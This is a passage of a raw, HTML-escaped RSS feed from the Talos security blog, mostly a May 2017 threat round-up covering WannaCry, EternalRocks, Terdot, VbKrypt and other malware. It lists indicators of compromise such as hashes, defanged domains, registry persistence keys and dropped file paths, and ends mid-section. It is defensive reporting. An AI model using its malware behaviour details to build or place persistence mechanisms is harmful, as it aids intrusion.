href="http://cs.co/talospodcast"&gt;http://cs.co/talospodcast&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;Subscribe via iTunes&amp;nbsp;&lt;/h4&gt;&lt;div&gt;&lt;a href="http://cs.co/talositunes"&gt;http://cs.co/talositunes&lt;/a&gt;&amp;nbsp;(and leave a review!)&lt;/div&gt;&lt;h4&gt;&lt;br /&gt;Check out the Talos Threat Research Blog&lt;/h4&gt;&lt;div&gt;&lt;a href="http://cs.co/talosresearch"&gt;http://cs.co/talosresearch&lt;/a&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;Subscribe to the Threat Source newsletter&lt;/h4&gt;&lt;div&gt;&lt;a href="http://cs.co/talosupdate"&gt;http://cs.co/talosupdate&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;Follow Talos on Twitter&lt;/h4&gt;&lt;div&gt;&lt;a href="http://cs.co/talostwitter"&gt;http://cs.co/talostwitter&lt;/a&gt;&lt;/div&gt;&lt;h4&gt;&lt;br /&gt;Give us your feedback and suggestions for topics&lt;/h4&gt;&lt;div&gt;&lt;a href="mailto:beerswithtalos@cisco.com"&gt;beerswithtalos@cisco.com&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=A9hZU268Umk:wFg39nIqAD4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/A9hZU268Umk" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-05-31T11:52:05.993-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-AjIP5TEdALw/WS23Q2uQuOI/AAAAAAAAAG0/LgXnyHSrXOwmGosuMzK2ZUQKTcyheFa5gCLcB/s72-c/Twitter_organictimeline2.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/05/bwt-ep5-it-has-been-0-days-since-this.html</feedburner:origLink></item><item><title>Threat Round-up for May 19 - May 26</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/ap40FDe81Ss/threat-roundup-0519-0526.html</link><category>AMP</category><category>ClamAV</category><category>Coverage</category><category>Snort</category><category>threats</category><category>Umbrella</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Fri, 26 May 2017 09:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-4324224048629176314</guid><description>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 19 and May 26. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.&lt;br /&gt;&lt;br /&gt;As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. 
For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;This week's most prevalent threats are:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Pdf.Tool.HeapSprayHeuristic-6316003-1&lt;/b&gt;&lt;br /&gt;JS Heap Spray&lt;br /&gt;Malicious PDFs leverage embedded JavaScript to exploit vulnerabilities or, at the very least, to gain access to the additional functionality JavaScript provides. Typical exploitation techniques require a heap spray, where JavaScript is used to copy the same data many times throughout the process' memory so that a corrupted pointer is likely to land on attacker-controlled bytes.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Dropper.Terdot-6320310-0&lt;/b&gt;&lt;br /&gt;Dropper&lt;br /&gt;This dropper is served by the Terror exploit kit. It injects into processes such as Explorer to download additional binaries and continue the infection. Similar droppers have been seen deploying Zeus variants.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Vbkrypt-10134&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;VbKrypt is a Visual Basic based trojan. It can be leveraged to perform any nefarious action on the infected system, such as installing additional malware, logging keystrokes, stealing files, or remotely controlling the system.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.EternalRocks1&lt;/b&gt;&lt;br /&gt;Worm&lt;br /&gt;EternalRocks uses seven NSA exploits to infect victims, and its command and control communication runs over Tor. The first stage downloads the components it needs and then drops a second sample. That sample waits 24 hours before downloading the exploits, then starts scanning the Internet for vulnerable SMB services.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Adylkuzz-6317076-0&lt;/b&gt;&lt;br /&gt;Miner&lt;br /&gt;Adylkuzz is a miner for the Monero cryptocurrency. 
It has seen a recent increase in installations from attackers using EternalBlue and DoublePulsar. See http://blog.talosintelligence.com/2017/05/adylkuzz-uiwix-eternalrocks.html for more information.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.WannaCry&lt;/b&gt;&lt;br /&gt;Ransomware Worm&lt;br /&gt;WannaCry scans heavily over TCP port 445 (Server Message Block/SMB), spreading like a worm: it compromises hosts, encrypts the files stored on them, and then demands a ransom payment in Bitcoin. It is important to note that this is not a threat that simply scans internal ranges to identify where to spread; it is also capable of spreading to other externally facing hosts across the Internet that expose the same vulnerability. See http://blog.talosintelligence.com/2017/05/wannacry.html for details.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.Jaff&lt;/b&gt;&lt;br /&gt;Ransomware&lt;br /&gt;Jaff is ransomware that is primarily spread via large-scale email campaigns. 
See the Talos Blog https://blog.talosintelligence.com/2017/05/jaff-ransomware.html for more information about this threat.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;hr /&gt;&lt;h2&gt;Threats&lt;/h2&gt;&lt;h3&gt;Pdf.Tool.HeapSprayHeuristic-6316003-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;526fef47936e460808fff7c605ee12e2cebe50234e7731680b545fb0863a6245&lt;/li&gt;&lt;li&gt;1b955f1bdc1eb61524cbd6caff84d1690551a5f7cb07b67e65cec78406c562c6&lt;/li&gt;&lt;li&gt;303aa9197752835d7f677a9961973371f8277f095768ad13df4b29f00a3206ff&lt;/li&gt;&lt;li&gt;594e36206836ac8a910adc18b412ed1c6c0bf5b46b90675b25bbbd6a7d9d238b&lt;/li&gt;&lt;li&gt;6a09e69f91c613b8b5b71cafd6ccb8fb2145892e3db2015228e0a27d18850a3c&lt;/li&gt;&lt;li&gt;8981e4350f4029e50f683b03938d55feae334e6873ccedff84e9b722bf99cc5d&lt;/li&gt;&lt;li&gt;a0dba623d4dc2b4fa03c0893ad08030a21401581a43ac0ebb6170a3ebc7b1eef&lt;/li&gt;&lt;li&gt;a80528b75ba4f54800a2008c83adc147fcdfe3dc097cb92a4925df18c01b0e0f&lt;/li&gt;&lt;li&gt;b1c3f1633acc80169cfe12ed884eed0d5d8912a28e05c43a9290113df4684bfd&lt;/li&gt;&lt;li&gt;f2ade3ddc5aa8cf52e01c0eba084a16eecb217b421c87e739223aff0cf8237cc&lt;/li&gt;&lt;li&gt;0567f4f2b9038c3a14eb5224140f22d7f07f99ca47b1d78d661343ef5cd50f5a&lt;/li&gt;&lt;li&gt;13220c18bd003aabd0260bbd40577aa3df827074ee72940e1dc76c746037e3a6&lt;/li&gt;&lt;li&gt;20ebeb7a52b841a483a1a1cb4337b529c7ad873b400009e52876c07291c46126&lt;/li&gt;&lt;li&gt;2341bb05ff14d4bae8b1c14fa9c709d5cec15ca3e0af6dbddf5
8d2d9d2ff4518&lt;/li&gt;&lt;li&gt;3385717cf4ceecad964116000d5394c52c3aa215fe483046c764c69490b75337&lt;/li&gt;&lt;li&gt;39a9434665b02c1598e94b8aa73b67ccd6d848ec34cfd0c49bc56d9c02032e8b&lt;/li&gt;&lt;li&gt;4ffd0c052cdba787983d6e05260fd1cac66f3550cbabf55b297cd099d1ede8be&lt;/li&gt;&lt;li&gt;60d47e644f644aa6f2842a118ee32cf2f16eb9f6726cf6b9d2ffdb5812be3cf1&lt;/li&gt;&lt;li&gt;6a72fe8202c34d505ca13ca34c48fc3398569cf5944b456711c115cdb9e38213&lt;/li&gt;&lt;li&gt;7a5c157a670543cba8bdda942636e43ad9a95c8265091b1e1e3f20a9c0407031&lt;/li&gt;&lt;li&gt;7ffc81ebfc069c013205e045d5f984f6017c7503dfaaed9728c315de68dceebe&lt;/li&gt;&lt;li&gt;a4ee1555b4586e3f28281ef0f2a367bca417de496d3224e473d6cf874a6abc22&lt;/li&gt;&lt;li&gt;ab01b3d5b25265b38eb8dfdfdc6a7e67eebee5c6cbde9afcf66442a82c01bf06&lt;/li&gt;&lt;li&gt;bb5cb32aff4fbaa252a4d2bc581e4777d4c106804a7e1f4092799be863baaa52&lt;/li&gt;&lt;li&gt;cf14adcac22fc30533057eccd40a82ff41eff433263b43c94515c94c5106460a&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-Mkaq7GwzNOU/WShRk-waJeI/AAAAAAAABAs/h_Qa0iwuY040CfFXcNqXZU-3LssXircUACLcB/s1600/Pdf_Tool_HeapSprayHeuristic_6316003_1_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" 
src="https://1.bp.blogspot.com/-Mkaq7GwzNOU/WShRk-waJeI/AAAAAAAABAs/h_Qa0iwuY040CfFXcNqXZU-3LssXircUACLcB/s320/Pdf_Tool_HeapSprayHeuristic_6316003_1_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-kktx4tSghRo/WShRpYBj4GI/AAAAAAAABAw/-Iw3TOplMEoqCjxmDCzQZ52nLdgWxCiwgCLcB/s1600/Pdf_Tool_HeapSprayHeuristic_6316003_1_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="261" data-original-width="1237" height="83" src="https://3.bp.blogspot.com/-kktx4tSghRo/WShRpYBj4GI/AAAAAAAABAw/-Iw3TOplMEoqCjxmDCzQZ52nLdgWxCiwgCLcB/s400/Pdf_Tool_HeapSprayHeuristic_6316003_1_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Dropper.Terdot-6320310-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;emptysand[.]ru&lt;/li&gt;&lt;li&gt;dogpaste[.]ru&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;9ae356843ccbda7747e45b292fcf0c3eebbcc4a93101752a0007c9abaa79037a&lt;/li&gt;&lt;li&gt;b9c8630f52d70a8e813e8c46911a1b010fae44ffa786f6a935cb7ffcd7077dda&lt;/li&gt;&lt;li&gt;5aaccf14351ea3bf2b60e9a67ae04eeaca5904fb6802f6d1c05ad27b985fd32d&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: 
center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;a href="https://4.bp.blogspot.com/-iMv93kZd6g0/WShR1qDDD1I/AAAAAAAABA0/-IvxK6062A833DdHqA4Y3DAe6BNMX4cEACLcB/s1600/DropperTeardot_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://4.bp.blogspot.com/-iMv93kZd6g0/WShR1qDDD1I/AAAAAAAABA0/-IvxK6062A833DdHqA4Y3DAe6BNMX4cEACLcB/s320/DropperTeardot_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-XNkhfDlD-A4/WShR9JP2ahI/AAAAAAAABA4/E6hEspC3H3MNzftsDKE0U7-ZUV2MXYq3ACLcB/s1600/DropperTeardot_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="694" data-original-width="1600" height="172" src="https://3.bp.blogspot.com/-XNkhfDlD-A4/WShR9JP2ahI/AAAAAAAABA4/E6hEspC3H3MNzftsDKE0U7-ZUV2MXYq3ACLcB/s400/DropperTeardot_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" 
style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-ra8arMX3Exs/WShSCseZ1qI/AAAAAAAABA8/rKlMLm0IrjcGV57deYMI7ZlLoTBQPPbuQCLcB/s1600/emptysand.ru_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="578" data-original-width="1112" height="207" src="https://3.bp.blogspot.com/-ra8arMX3Exs/WShSCseZ1qI/AAAAAAAABA8/rKlMLm0IrjcGV57deYMI7ZlLoTBQPPbuQCLcB/s400/emptysand.ru_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Vbkrypt-10134&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;AutoDetect&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;IntranetName&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;C:\Documents and Settings\Administrator\Application Data\Directory\Windowsdef.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;WindowsDef&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: 
&lt;/b&gt;internat.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM\MUICACHE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Gwogr.bat&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyBypass&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM\MUICACHE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;C:\Documents and Settings\Administrator\Application Data\Directory\Windowsdef.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;C:\Documents and Settings\Administrator\Application Data\bot.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;UNCAsIntranet&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DoNotAllowExceptions&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Local\ZonesCounterMutex&lt;/li&gt;&lt;li&gt;1BZ5FV6FEI&lt;/li&gt;&lt;li&gt;Local\ZonesLockedCacheCounterMutex&lt;/li&gt;&lt;li&gt;Local\ZonesCacheCounterMutex&lt;/li&gt;&lt;li&gt;Local\ZoneAttributeCacheCounterMutex&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories 
created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\Directory\Windowsdef.exe&lt;/li&gt;&lt;li&gt;%AppData%\bot.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;12cb31c388e382c74397a579992e1f2652464d45630b8c7ae01e6fab03402e10&lt;/li&gt;&lt;li&gt;082898025d2f21461b3d818d2452b900f3401881fc5d719d40855e461bd03b84&lt;/li&gt;&lt;li&gt;724ddead0de7d84c07d4de7d871303530ef2b426ab454150d5fd907a0bb2f339&lt;/li&gt;&lt;li&gt;e437019d08da1936c43214ca6370ebe74b3ddb60a3d80cfa4a26cd3ba606b2f1&lt;/li&gt;&lt;li&gt;3350127c80a88cc69cf7b88993c96ff0497b0b9492eea637cfb9fa13fec04951&lt;/li&gt;&lt;li&gt;6de059771fa64f404f04a43f89512d5f29f0860fd413ebf98371c77664558c99&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-bPsDOTpTKag/WShXqanl_aI/AAAAAAAABBM/NEpKHkGdOYojTTcmmbOzzqWUnB-WOfIqQCLcB/s1600/Win_Trojan_Vbkrypt_10134_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="241" data-original-width="351" height="219" src="https://3.bp.blogspot.com/-bPsDOTpTKag/WShXqanl_aI/AAAAAAAABBM/NEpKHkGdOYojTTcmmbOzzqWUnB-WOfIqQCLcB/s320/Win_Trojan_Vbkrypt_10134_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br 
/&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-UPAPd2H6Hk4/WShXwjH-fuI/AAAAAAAABBQ/S7BYQLyByEYUQ0XCmqo9ct0pVOdLfkTIACLcB/s1600/Win_Trojan_Vbkrypt_10134_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="779" data-original-width="1101" height="282" src="https://4.bp.blogspot.com/-UPAPd2H6Hk4/WShXwjH-fuI/AAAAAAAABBQ/S7BYQLyByEYUQ0XCmqo9ct0pVOdLfkTIACLcB/s400/Win_Trojan_Vbkrypt_10134_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.EternalRocks1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyEnable&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyServer&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyBypass&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyBypass&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: 
